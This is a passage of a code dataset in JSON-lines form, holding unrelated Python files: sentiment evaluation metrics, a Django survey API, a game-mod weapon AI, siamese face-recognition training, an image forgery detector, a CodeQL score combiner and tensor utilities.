golden, test_review, vocab,model):\r\n self.aspect = aspect\r\n self.golden = golden\r\n self.test_review = test_review\r\n self.vocab = vocab\r\n self.model = model\r\n \r\n \r\n def sentiment_accuracy(self, boundary = 0.5):\r\n aspect_review = []\r\n aspect_polarity = []\r\n for i in range(len(self.test_review)):\r\n if self.aspect in self.golden[i]:\r\n if self.golden[i][self.aspect] == 'positive' or self.golden[i][self.aspect] == 'negative':\r\n aspect_review.append(self.test_review[i])\r\n aspect_polarity.append(self.golden[i][self.aspect])\r\n \r\n test_r1, test_r2 = Read_data({self.aspect:aspect_review}, self.aspect,self.vocab,stopword=True).sentence_convert() \r\n test_train_x = sequence.pad_sequences(test_r1, maxlen= self.model.layers[0].output.get_shape()[1])\r\n class_output_model=K.function([self.model.get_layer('sentence_input').input],[self.model.get_layer('class').output])\r\n probability_test=np.asarray(class_output_model([test_train_x])) \r\n predict_label=[]\r\n for i in range(probability_test[0].shape[0]):\r\n if probability_test[0][i][0]> boundary:\r\n predict_label.append('positive')\r\n else:\r\n predict_label.append('negative')\r\n \r\n accuracy = 0\r\n for i in range(len(predict_label)):\r\n if predict_label[i] == aspect_polarity[i]:\r\n accuracy += 1\r\n TP_pos = 0 \r\n FP_pos = 0\r\n FN_pos = 0\r\n TP_neg = 0 \r\n FP_neg = 0\r\n FN_neg = 0\r\n for i in range(len(predict_label)):\r\n if predict_label[i] == aspect_polarity[i] and predict_label[i] == 'positive': \r\n TP_pos += 1 \r\n elif predict_label[i] != aspect_polarity[i] and predict_label[i] == 'positive':\r\n FP_pos += 1\r\n elif predict_label[i] != aspect_polarity[i] and aspect_polarity[i] == 'positive':\r\n FN_pos += 1\r\n for i in range(len(predict_label)): \r\n if predict_label[i] == aspect_polarity[i] and predict_label[i] == 'negative': \r\n TP_neg += 1 \r\n elif predict_label[i] != aspect_polarity[i] and predict_label[i] == 'negative':\r\n FP_neg += 1\r\n elif predict_label[i] != aspect_polarity[i] and aspect_polarity[i] == 'negative':\r\n FN_neg += 1\r\n \r\n precision_pos = TP_pos/ (TP_pos + FP_pos)\r\n recall_pos = TP_pos / (TP_pos + FN_pos)\r\n precision_neg = TP_neg / (TP_neg + FP_neg )\r\n recall_neg = TP_neg / (TP_neg + FN_neg )\r\n F1_pos = 2*precision_pos*recall_pos / (precision_pos+recall_pos)\r\n F1_neg = 2*precision_neg*recall_neg / (precision_neg+recall_neg)\r\n \r\n return {'accuracy':accuracy/len(predict_label) , 'F1_pos':F1_pos, 'F1_neg':F1_neg}\r\n \r\n def combined_accuracy(self, combined_prediction):\r\n aspect_review = []\r\n aspect_polarity = []\r\n for i in range(len(self.test_review)):\r\n if self.aspect in self.golden[i]:\r\n if self.golden[i][self.aspect] == 'positive' or self.golden[i][self.aspect] == 'negative':\r\n aspect_review.append(self.test_review[i])\r\n aspect_polarity.append(self.golden[i][self.aspect])\r\n \r\n TN_pos = 0\r\n TN_neg = 0 \r\n accuracy = 0\r\n for sentence, polarity in combined_prediction.items():\r\n if sentence in aspect_review and polarity == aspect_polarity[aspect_review.index(sentence)]:\r\n accuracy += 1\r\n if polarity == 'positive':\r\n TN_pos +=1\r\n else:\r\n TN_neg +=1\r\n prediction_polarity = [i for i in combined_prediction.values()]\r\n pos_prediction = prediction_polarity.count('positive')\r\n neg_prediction = prediction_polarity.count('negative')\r\n \r\n pos_true = aspect_polarity.count('positive')\r\n neg_true = aspect_polarity.count('negative')\r\n \r\n output = {'pos':[TN_pos,pos_prediction,pos_true],'neg':[TN_neg,neg_prediction,neg_true]}\r\n return output, [accuracy,len(combined_prediction)]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n","sub_path":"new_eva.py","file_name":"new_eva.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"335030180","text":"# Copyright (c) 2017, DjaoDjin inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\n# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport logging\n\nfrom rest_framework import generics, mixins, status\nfrom rest_framework import response as http\n\nfrom ..mixins import ResponseMixin\nfrom ..models import Answer, Question\nfrom .serializers import AnswerSerializer, ResponseSerializer\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass AnswerAPIView(ResponseMixin, mixins.CreateModelMixin,\n generics.RetrieveUpdateDestroyAPIView):\n\n serializer_class = AnswerSerializer\n lookup_rank_kwarg = 'rank'\n\n @property\n def question(self):\n if not hasattr(self, '_question'):\n self._question = Question.objects.get(\n survey=self.sample.survey, rank=self.kwargs.get(\n self.lookup_rank_kwarg))\n return self._question\n\n def update(self, request, *args, **kwargs):\n #pylint:disable=unused-argument\n partial = kwargs.pop('partial', False)\n serializer = self.get_serializer(data=request.data, partial=partial)\n serializer.is_valid(raise_exception=True)\n try:\n serializer.instance = Answer.objects.get(\n response=self.sample, question=self.question)\n self.perform_update(serializer)\n except Answer.DoesNotExist:\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return http.Response(serializer.data,\n status=status.HTTP_201_CREATED, headers=headers)\n\n return http.Response(serializer.data)\n\n def perform_create(self, serializer):\n serializer.save(response=self.sample, question=self.question,\n rank=self.question.rank)\n\n\nclass ResponseAPIView(ResponseMixin, generics.RetrieveUpdateDestroyAPIView):\n\n serializer_class = ResponseSerializer\n\n def get_object(self):\n return self.sample\n","sub_path":"survey/api/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"133251873","text":"# Tournament Play Enhancements (1.1) by Windyplains\n# Released 8/30/2011\n\n# WHAT THIS FILE DOES:\n# Adds \"AI_triggers\" to module_mission_template.py's \"tournament_triggers\" to enable the \"Dynamic Weapon AI\" feature.\n\nfrom header_common import *\nfrom header_operations import *\nfrom module_constants import *\nfrom header_mission_templates import *\n\n\nAI_triggers = [ \n## TOURNAMENT PLAY ENHANCEMENTS (1.0) - Windyplains - Weapon AI\n# If mounted -> equip lance if you have one.\n# If enemy distant -> equip ranged weapon if you have one.\n# if enemy close -> equip melee weapon.\n(0, 0, 1, \n\t[(eq, \"$g_mt_mode\", abm_tournament),],\n\t[\n # Run through all active NPCs on the tournament battle field.\n (try_for_agents, \":agent_self\"),\n # Isn't a player.\n (agent_is_non_player, \":agent_self\"),\n # Isn't a horse.\n (agent_is_human, \":agent_self\"),\n # Hasn't been defeated.\n (agent_is_alive, \":agent_self\"),\n\t\t# exclude tournament masters\n\t\t(agent_get_troop_id, \":troop_self\", \":agent_self\"),\n\t\t(neg|is_between, \":troop_self\", \"trp_town_1_arena_master\", \"trp_town_1_armorer\"),\n # They riding a horse?\n\t\t(agent_get_horse, \":horse\", \":agent_self\"), # 0 - No, 1 - Yes\n\t\t\n\t\t# Determine closest enemy.\n\t\t(assign, \":shortest_distance\", 10000),\n\t\t(str_store_string, s1, \"@No one\"),\n\t\t(str_store_troop_name, s2, \":troop_self\"),\n\t\t(agent_get_position, pos1, \":agent_self\"),\n\t\t(assign, \":distance\", 10000),\n\t\t(try_for_agents, \":agent_enemy\"),\n\t\t\t(agent_get_troop_id, \":troop_enemy\", \":agent_enemy\"),\n\t\t\t# Not looking at self.\n\t\t\t(neq, \":agent_enemy\", \":agent_self\"),\n\t\t\t# exclude tournament masters\n\t\t\t(neg|is_between, \":troop_enemy\", \"trp_town_1_arena_master\", \"trp_town_1_armorer\"),\n\t\t\t# Not an ally\n\t\t\t(agent_get_team, \":team_self\", \":agent_self\"),\n\t\t\t(agent_get_team, \":team_enemy\", \":agent_enemy\"),\n\t\t\t(neq, \":team_self\", \":team_enemy\"),\n\t\t\t# Isn't a horse.\n\t\t\t(agent_is_human, \":agent_enemy\"),\n\t\t\t# Hasn't been defeated.\n\t\t\t(agent_is_alive, \":agent_enemy\"),\n\t\t\t\n\t\t\t(agent_get_position, pos2, \":agent_enemy\"),\n\t\t\t(get_distance_between_positions,\":distance\",pos1,pos2),\n\t\t\t(try_begin),\n\t\t\t\t(lt, \":distance\", \":shortest_distance\"),\n\t\t\t\t(assign, \":shortest_distance\", \":distance\"),\n\t\t\t\t(str_store_troop_name, s1, \":troop_enemy\"),\n\t\t\t\t(assign, reg0, \":shortest_distance\"),\n\t\t\t\t(agent_get_horse, \":enemy_mounted\", \":agent_enemy\"),\n\t\t\t(try_end),\n\t\t(try_end),\n\t\t\n\t\t# If you enable this save yourself a headache and up the trigger timing.\n\t\t(try_begin), (eq, wp_tpe_debug, 2), (display_message, \"@DEBUG (Weapon AI): {s2}'s closest enemy is {s1} at a distance of {reg0}.\"), (try_end),\n\t\t\n\t\t(assign, \":weapon_choice\", 0),\n\t\t(try_begin),\n\t\t\t(ge, \":horse\", 0),\n\t\t\t(this_or_next|agent_has_item_equipped,\":agent_self\",wp_tpe_normal_lance),\n\t\t\t(agent_has_item_equipped,\":agent_self\",wp_tpe_enhanced_lance),\n\t\t\t(assign, \":weapon_choice\", 2), # Bypasses melee/ranged options.\n\t\t(else_try),\n\t\t\t(le, \":enemy_mounted\", 0),\n\t\t\t(le, \":shortest_distance\", wp_tpe_enemy_approaching_foot),\n\t\t\t(assign, \":weapon_choice\", 1),\n\t\t(else_try),\n\t\t\t(ge, \":enemy_mounted\", 1),\n\t\t\t(le, \":shortest_distance\", wp_tpe_enemy_approaching_mounted),\n\t\t\t(assign, \":weapon_choice\", 1),\n\t\t(try_end),\n\t\t\n\t\t(try_begin),\n\t\t\t(eq, \":weapon_choice\", 1),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_polearm),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_polearm),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_sword),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_sword),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_greatsword),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_greatsword),\n\t\t(else_try),\n\t\t\t(eq, \":weapon_choice\", 0),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_bow),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_bow),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_crossbow),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_crossbow),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_javelin),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_javelin),\n\t\t(else_try),\n\t\t\t(eq, \":weapon_choice\", 2),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_normal_lance),\n\t\t\t(agent_set_wielded_item, \":agent_self\", wp_tpe_enhanced_lance),\n\t\t(try_end),\n (try_end),\n ]),\n \n(0, 0, ti_once, \n\t[(eq, \"$g_mt_mode\", abm_tournament),],\n\t[\n\t\t# Run through all active NPCs on the tournament battle field.\n\t\t(try_for_agents, \":agent_self\"),\n\t\t\t(agent_equip_item, \":agent_self\", wp_tpe_normal_boots),\n\t\t\t(agent_equip_item, \":agent_self\", wp_tpe_enhanced_boots),\n\t\t(try_end),\n\t]),\n## TOURNAMENT PLAY ENHANCEMENTS end\n]\n\ndef modmerge_mission_templates(orig_mission_templates):\n\tfind_i = find_object( orig_mission_templates, \"arena_melee_fight\" )\n\torig_mission_templates[find_i][5].extend(AI_triggers)\n\n# Used by modmerger framework version >= 200 to merge stuff\n# This function will be looked for and called by modmerger if this mod is active\n# Do not rename the function, though you can insert your own merging calls where indicated\ndef modmerge(var_set):\n try:\n var_name_1 = \"mission_templates\"\n orig_mission_templates = var_set[var_name_1]\n modmerge_mission_templates(orig_mission_templates)\n\n except KeyError:\n errstring = \"Variable set does not contain expected variable: \\\"%s\\\".\" % var_name_1\n raise ValueError(errstring)","sub_path":"source/tournament_mission_templates.py","file_name":"tournament_mission_templates.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"428563064","text":"from facialrec.build_resnet import resnet50\nfrom facialrec import utils\nfrom facialrec import config\nimport make_image_pairs\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.layers import Lambda\n\n# loading data\nprint('[Data] Loading the dataset.')\ntrainX, testX, trainY, testY = make_image_pairs.loadData('small_lfw')\nprint('[Data] Making the training samples.')\ntrainPair, trainLabel = make_image_pairs.make_pairs(trainX,trainY)\nprint('[Data] Done!')\nprint('[Data] Making the testing samples.')\ntestPair, testLabel = make_image_pairs.make_pairs(testX,testY)\ntrainPair = trainPair[:280]\ntrainLabel = trainLabel[:280]\ntestPair = testPair[:120]\ntestLabel = testLabel[:120]\n\nprint('[Data] Done!')\n\n\n# building the network\nprint('[Build] Building network architecture.')\nimgA = Input(shape=config.IMG_SHAPE)\nimgB = Input(shape=config.IMG_SHAPE)\n\nfeatureExtractor = resnet50(config.IMG_SHAPE)\nfeatsA = featureExtractor(imgA)\nfeatsB = featureExtractor(imgB)\ndistance = Lambda(utils.euclidean_distance)([featsA, featsB])\noutputs = Dense(1, activation=\"sigmoid\")(distance)\nmodel = Model(inputs=[imgA, imgB], outputs=outputs)\n\n# compile the model\nprint(\"[INFO] compiling model...\")\nopt = tf.keras.optimizers.SGD(learning_rate=0.1)\nmodel.compile(loss=\"binary_crossentropy\", optimizer='Adam',\n\tmetrics=[\"accuracy\"])\n\n# train the model\nprint(\"[INFO] training model...\")\n# setting up tensorboard\ntensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=config.LOG_PATH, histogram_freq=1)\n\nhistory = model.fit(\n [trainPair[:, 0], trainPair[:, 1]], trainLabel[:],\n validation_data=([testPair[:, 0], testPair[:, 1]], testLabel[:]),\n callbacks= [tensorboard_callback],\n batch_size=config.BATCH_SIZE,\n epochs=config.EPOCHS)\n# serialize the model to disk\nprint(\"[INFO] saving siamese model...\")\nmodel.save(config.MODEL_PATH)\n# plot the training history\nprint(\"[INFO] plotting training history...\")\nutils.plot_training(history, config.PLOT_PATH)","sub_path":"train_res.py","file_name":"train_res.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"491319270","text":"ACTION=0\nTOP12_STACK=1\nSAME_SENT=2\nSAME_PARA=3\nNOT_PRESENT=4\nSTACK_QUEUE=5\nTOP_1=6\nSENT_START=7\nSENT_END=8\nPARA_START=9\nPARA_END=10\nDOC_START=11\nDOC_END=12\nTOP_2=13\nQUEUE=14\nQUEUE_1=15\nRIGHT_DEP=16\nDEP_RELATION=17\nLEFT_DEP=18\nNO_DEP=19\nNO_PRESENT_DEP=20\nTOP1_STACK=21\nTOP2_STACK=22\nFIRST_QUEUE=23\nFORM=24\nDIST_TO_SENT_BEGIN=25\nDIST_TO_SENT_END=26\nDIST_TO_PARA_BEGIN=27\nDIST_TO_PARA_END=28\nDIST_TO_DOC_BEGIN=29\nDIST_TO_DOC_END=30\nNOT_PRESENT_NUM_2=31\nTOP12_QUEUE=32\nTOP12_STACK_QUEUE=33\nEDU_COMPARISON=34\nSENT_CONTINUE=35\nPARA_CONTINUE=36\nN_EDUS=37\nN_SENTS=38\nTOP1_STACK_NUM_CAT=39\nTOP2_STACK_NUM_CAT=40\nSENT_COMPARISON=41\nTOP_STACK=42\nTOP_STACK_NUM_CAT=43\nNOT_PRESENT_NUM_6=44\nSTACK=45\nNUCLEUS_FEAT=46\nNUC_EDU_HEAD_WORD=47\nNUC_EDU_HEAD_DEP=48\nNUC_EDU_DEP_WORD=49\nNOT_PRESENT_DEP=50\nYELP = \"yelp\"\nRST = \"rst\"\nINSTR = \"instr\"\nDATASET_TYPE = \"dataset_type\"\nEDU_DIM = \"edu_dim\"\nDEVICE = \"device\"\nUSE_RNN = \"use_rnn\"\nUSE_BERT = \"use_bert\"\nUSE_DEV = \"use_dev\"\nLR = \"lr\"\nNUM_OUT_LAYERS = \"num_out_layers\"\nUSE_ATTENTION = \"use_attention\"\nHIDDEN_DIM = \"hidden_dim\"\nTFMER_N_LAYERS = \"tfmer_n_layers\"\nW_DECAY = \"weight_decay\"\nUSE_STACK = \"use_stack\"\nDO_ONLINE= \"do_online\"\nUSE_TUNE= \"use_tune\"\nZERO_PADS= \"zero_pads\"\nBATCH_SIZE=\"batch_size\"\nKEEP_BOUNDARIES=\"keep_boundaries\"\nSTATUS_FEATS=\"status_features\"\nOP_FEATS=\"op_feats\"\nORG_FEATS=\"org_feats\"\nSYNT_FEATS=\"synt_feats\"\nSTRUCT_FEATS=\"struct_feats\"\nLENGTH_FEATS=\"length_feats\"\nNUC_FEATS=\"nuc_feats\"\nDO_COREF=\"do_coref\"\nMODEL_NAME=\"model_name\"\nMODEL_TYPE=\"model_type\"\nEPOCH_START=\"epoch_start\"\nPRETRAINED_COREF_PATH=\"pretrained_coref_path\"","sub_path":"src/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"26850521","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport time\n\nfrom minion.plugin_api import BlockingPlugin\n\nclass DelayedPlugin(BlockingPlugin):\n def do_run(self):\n for n in range(0,10):\n if self.stopped:\n return\n time.sleep(1)\n message = self.configuration.get('message', 'Hello, world')\n self.report_issues([{ \"Summary\":message, \"Severity\":\"Info\" }])\n\nclass FailingPlugin(BlockingPlugin):\n def do_run(self):\n raise Exception(\"Failing plugins gonna fail\")\n","sub_path":"plugin-service/minion/plugins/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"70940094","text":"import pandas as pd\r\nimport sqlite3\r\n\r\ndf = pd.read_csv('buddymove_holidayiq.csv')\r\nconn = sqlite3.connect('buddymove_holidayiq.sqlite3')\r\ndf.to_sql(\"buddymove\", con=conn)\r\n\r\n# How many rows do we have? (should be 249)\r\nrow_query = '''\r\nSELECT\r\n count('User Id') as NumUsers\r\nFROM buddymove\r\n'''\r\ntotal_rows = conn.execute(row_query).fetchone()\r\nprint(\"Total # of rows\", total_rows)\r\n\r\n# How many users reviewed at least 100 nature and 100 shopping?\r\n\r\nreview_query = '''\r\nSELECT\r\n\tcount('User Id')\r\nFROM buddymove\r\nWHERE Nature >= 100 and Shopping >= 100\r\n'''\r\nreview_users = conn.execute(review_query).fetchone()\r\nprint(\"Amount of users who reviewed 100 nature and shopping category\", review_users)\r\n","sub_path":"module1-introduction-to-sql/buddymove_holidayiq.py","file_name":"buddymove_holidayiq.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"486346780","text":"from datetime import datetime\nfrom skimage.feature import blob_dog\nfrom math import sqrt\nimport cv2\nimport numpy as np\nimport scipy\nfrom scipy import ndimage\nfrom scipy.spatial import distance\nimport glob, os\nfrom PIL import Image\nimport requests\nimport urllib.request\nimport requests, io\nimport matplotlib.pyplot as plt \n\n# Initiate BRISK detector\nbrisk = cv2.BRISK_create(27)\n# create BFMatcher object\nmatcher = cv2.DescriptorMatcher_create(cv2.DescriptorMatcher_BRUTEFORCE_HAMMING)\n\n\ndef sobel_f(im1):\n\timage =im1.astype (int)\n\t# derivatives\n\tdx=ndimage.sobel(image, 1)\n\tdy=ndimage.sobel(image, 0)\n\tmag=np.hypot(dx, dy)\n\t# normalization\n\tmag*= 255.0 / np.max(mag)\n\tsobel_im1 = np.uint8(mag)\n\treturn sobel_im1\n\n#DoG\ndef dog_f(im1_gray):\n\tblobs_dog = blob_dog(im1_gray, max_sigma=40, threshold=.1)\n\tblobs_dog[:, 2] = blobs_dog[:, 2] * sqrt(2)\n\treturn blobs_dog\n\n#Blobs\ndef show_f(blobs_all):\n\tblob_area =[]\n\tblobs_list = [blobs_all]\n\tfor blobs in blobs_list:\n\t\tfor blob in blobs:\n\t\t\ty, x, r = blob\n\t\t\tarea = [y,x,r] \n\t\t\tif 2*r > 1:\n\t\t\t\t#print area\n\t\t\t\tblob_area.append(area) \n\treturn blob_area\n\nasync def forgery_detect(image_urls):\n\ti = 0\n\tflag=0\n\timages = []\n\timage_urls_items = image_urls.items()\n\tfor key,value in image_urls_items:\n\t\tif (value != \"\"):\n\t\t\timages.append(value)\n\t# \tresp = urllib.request.urlopen(value)\n\t# \tprint(resp)\n\n\t# \tif (value != \"\"):\n\t# \t\tprint(value)\n\t# \t\tresp = urllib.request.urlopen(value)\n\t# print (resp)\n\t\n\tfor im in images:\n\t\tstart_time = datetime.now()\n\t\t#print('time :',start_time)\n\t\t# resp = urllib.request.urlopen(im)\n\t\t# print(resp)\n\t\t# im1 = np.asarray(bytearray(resp.read()), dtype=\"uint8\")\n\t\tresponse = requests.get(im).content\n\t\tim1 = plt.imread(io.BytesIO(response), format='JPG')\n\t\tplt.imshow(im1)\n\t\tsobel = sobel_f(im1)\n\t\tsobel_gray =cv2.cvtColor(sobel, cv2.COLOR_BGR2GRAY)\n\t\tim2_gray =cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n\t\tblobs_all = dog_f(sobel_gray)\n\t\toutput = show_f(blobs_all)\n\t\tclone1 = im1.copy()\n\t\tkey,des = brisk.detectAndCompute(im2_gray, None)\n\t\tprint(len(key),'...',len(des))\n \n\t\tll =[]\n\t\tfor b0 in range(0,len(output)):\n\t\t\tb0y,b0x,b0r = output[b0]\n\t\t\tcv2.circle(clone1, (int(b0x),int(b0y)), int(b0r), (0, 0, 200), 1) \n\t\t\tl =[]\n\t\t\tkp_1 =[]\n\t\t\tds_1 =[]\n\t\t\tl3 =[]\n\t\t\tindex= 0\n\t\t\tfor k,d in zip(key,des):\n\t\t\t\tif (k.pt[0] - b0x)**2 + (k.pt[1] - b0y)**2 <= (b0r **2):\n\t\t\t\t\tl.append(index)\n\t\t\t\t\t#print('l :',len(l))\n\t\t\t\t\tkp_1.append(k)\n\t\t\t\t\tds_1.append(d)\n\t\t\t\tindex+=1\n\t\t\tif l:\n\t\t\t\tkp_2= np.delete(key,l,axis=0)\n\t\t\t\tds_2 = np.delete(des,l,axis=0)\n\t\t\t\t#print('k :',len(kp),'...',len(ds))\n\t\t\t\tnn_matches = matcher.knnMatch(np.array(ds_1), ds_2, 2)\n\t\t\t\t#print(nn_matches)\n\t\t\t\tmatched1 = []\n\t\t\t\tmatched2 = []\n\t\t\t\tnn_match_ratio = 0.43 # Nearest neighbor matching ratio\n\t\t\t\tfor m, n in nn_matches:\n\t\t\t\t\tif m.distance < nn_match_ratio * n.distance:\n\t\t\t\t\t\tmatched1.append(kp_1[m.queryIdx])\n\t\t\t\t\t\tmatched2.append(kp_2[m.trainIdx])\n\t\t\t\t\tif len(matched1)>=4 :\n\t\t\t\t\t\tflag = 1\n\t\t\t\t\t\tfor k1,k2 in zip(matched1,matched2):\n\t\t\t\t\t\t\t\tcv2.line(clone1,(int(k1.pt[0]),int(k1.pt[1])),(int(k2.pt[0]),int(k2.pt[1])),(50,200,50),2)\n \n\t\t\n\t\tif flag == 1:\n\t\t\treturn (\"fake\")\n\t\tflag = 0\n\t\t#cv2.imshow('image',clone1)\n \n\t\tend_time = datetime.now()\n\t\tprint('Duration: {}'.format(end_time - start_time))\n\t\ti += 1\n\tcv2.waitKey(0)\n\tcv2.destroyAllWindows()","sub_path":"backend/app/server/controllers/forgery_detect.py","file_name":"forgery_detect.py","file_ext":"py","file_size_in_byte":3323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"449971716","text":"import glob\nimport argparse\nimport logging\nimport os\nimport re\nimport numpy as np\nimport pandas as pd\n\n\n\ndef combine_scores(query, \\\n project_dir=os.path.dirname(os.path.dirname(os.path.realpath(__file__)))):\n \n files=glob.glob(os.path.join(project_dir,\"results\")+\"/*/{0}-*/reprScores.txt\".format(query))\n print(files)\n\n files.sort(key=os.path.getmtime)\n n=0\n allreps=[]\n src_dict = dict()\n snk_dict = dict()\n san_dict = dict()\n file_src_reprs = dict()\n file_snk_reprs = dict()\n file_san_reprs = dict()\n for reprScoreFile in files:\n if r'results\\combined' not in reprScoreFile:\n print(reprScoreFile)\n file_src_reprs[reprScoreFile] = []\n file_snk_reprs[reprScoreFile] = []\n file_san_reprs[reprScoreFile] = []\n n+=1\n for reprScopeLine in open(reprScoreFile).readlines():\n repr=re.findall(\"repr = \\\"([^\\\"]+)\\\"\", reprScopeLine)[0]\n t=re.findall(\"t = \\\"([^\\\"]+)\\\"\", reprScopeLine)[0]\n res=float(re.findall(\"result = ([0-9.]+)\", reprScopeLine)[0])\n #print(l.strip())\n #print(repr, t, res)\n if t == \"src\":\n src_dict[repr] = src_dict.get(repr, []) + [res]\n file_src_reprs[reprScoreFile] = file_src_reprs.get(reprScoreFile, []) + [repr]\n if t == \"snk\":\n snk_dict[repr] = snk_dict.get(repr, []) + [res]\n file_snk_reprs[reprScoreFile] = file_snk_reprs.get(reprScoreFile, []) + [repr]\n if t == \"san\":\n san_dict[repr] = san_dict.get(repr, []) + [res]\n file_san_reprs[reprScoreFile] = file_san_reprs.get(reprScoreFile, []) + [repr]\n\n\n print(n)\n\n\n print(len(src_dict), len(snk_dict), len(san_dict))\n with open(\"allscores_{0}_avg.txt\".format(query), \"w\") as scoresfile:\n scoresfile.write(\" or\\n\".join([\"repr = \\\"{0}\\\" and t = \\\"{1}\\\" and result = {2}\".format(k, \"src\", np.mean(src_dict[k])) for k in src_dict.keys()]))\n scoresfile.write(\"\\nor\\n\")\n scoresfile.write(\" or\\n\".join([\"repr = \\\"{0}\\\" and t = \\\"{1}\\\" and result = {2}\".format(k, \"snk\", np.mean(snk_dict[k])) for k in snk_dict.keys()]))\n scoresfile.write(\"\\nor\\n\")\n scoresfile.write(\" or\\n\".join([\"repr = \\\"{0}\\\" and t = \\\"{1}\\\" and result = {2}\".format(k, \"san\", np.mean(san_dict[k])) for k in san_dict.keys()]))\n\n\n\n\n\nparser = argparse.ArgumentParser()\nlogging.basicConfig(level=logging.INFO, format=\"[%(levelname)s\\t%(asctime)s] %(name)s\\t%(message)s\")\n\n\n#parser.add_argument(\"--project-dir\", dest=\"project_dir\", required=True, type=str,\n# help=\"Directory of the CodeQL database\")\nparser.add_argument(\"--query-name\", dest=\"query_name\", required=True, type=str,\n choices=[\"NosqlInjectionWorse\", \"SqlInjectionWorse\", \"DomBasedXssWorse\"],\n help=\"Name of the query to solve\")\n\nparsed_arguments = parser.parse_args()\n#project_dir = os.path.normpath(parsed_arguments.project_dir)\n#project_name = os.path.basename(project_dir)\n#query = os.environ[\"QUERY_NAME\"]\nquery_name = parsed_arguments.query_name\n\nif __name__ == '__main__':\n combine_scores(query_name)\n","sub_path":"constraintsolving/misc/combinescores.py","file_name":"combinescores.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"589478982","text":"import numpy as np\nimport torch.nn as nn\n\nfrom .polar_transforms import *\n\n\ndef unsqueeze_n(x, dims=[-1]):\n for i in dims:\n x = x.unsqueeze(i)\n return x\n\n\ndef magnitude(input):\n real, imag = torch.unbind(input, -1)\n return (real ** 2 + imag ** 2) ** 0.5\n\n\ndef complex_std(x):\n '''\n Standard deviation of real and imaginary channels\n STD = sqrt( E{(x-mu)(x-mu)*} ), where * is the complex conjugate,\n\n - Source: https://en.wikipedia.org/wiki/Variance#Generalizations\n '''\n mu = torch.mean(torch.mean(x, 2, True), 3, True)\n\n xm = torch.sum(((x - mu) ** 2), 2, True)\n return torch.mean(torch.mean(xm, 2, True), 3, True) ** (0.5)\n\n\ndef normalizeComplexBatch(x):\n ''' normalize real and imaginary channels'''\n return (x - torch.mean(torch.mean(x, 2, True), 3, True)) / complex_std(x)\n\n\ndef log_mag(x, polar=False):\n '''calculates the log of the magnitude in a complex 